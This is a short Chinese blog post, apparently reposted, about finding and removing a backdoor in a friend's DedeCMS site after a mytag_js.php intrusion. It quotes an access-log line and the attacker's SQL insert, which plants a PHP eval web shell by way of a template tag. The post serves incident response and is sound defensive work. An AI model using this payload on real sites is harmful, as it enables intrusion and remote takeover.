话说我朋友的网站是dedecms的，上次遭到了mytag_js.php漏洞的入侵，之后我给他做了基本的安全设置（目录不可写，不可执行等）但他还是被黑了。

于是就翻日志，发现了这么一条：

xxx.xx.xx.xxx – - [26/Nov/2011:14:28:33 +0800] “POST /plus/mytag_js.php?id=8 HTTP/1.1″ 200 1141402

想，他请求这么多次?id=8干啥啊，结果想了想，既然漏洞利用条件是远程数据库并且在数据里插入了

insert into dede_mytag(aid,normbody) values(2,’{dede:php}$fp = @fopen(DEDEROOT.”safe121.com.php”, ”a”);@fwrite($fp, ”<?php eval($_POST["www.2cto.com"]) ?>”);echo “y”;@fclose($fp);{/dede:php}{/dede:php}’);

会不会他在本地数据库里也插入了这个呢，结果一看，还真是..

(此图已经经过处理)

然后又检查了myad_js表，均发现了这种后门，清理之，网站就没被入侵了。

摘自:www.0day.la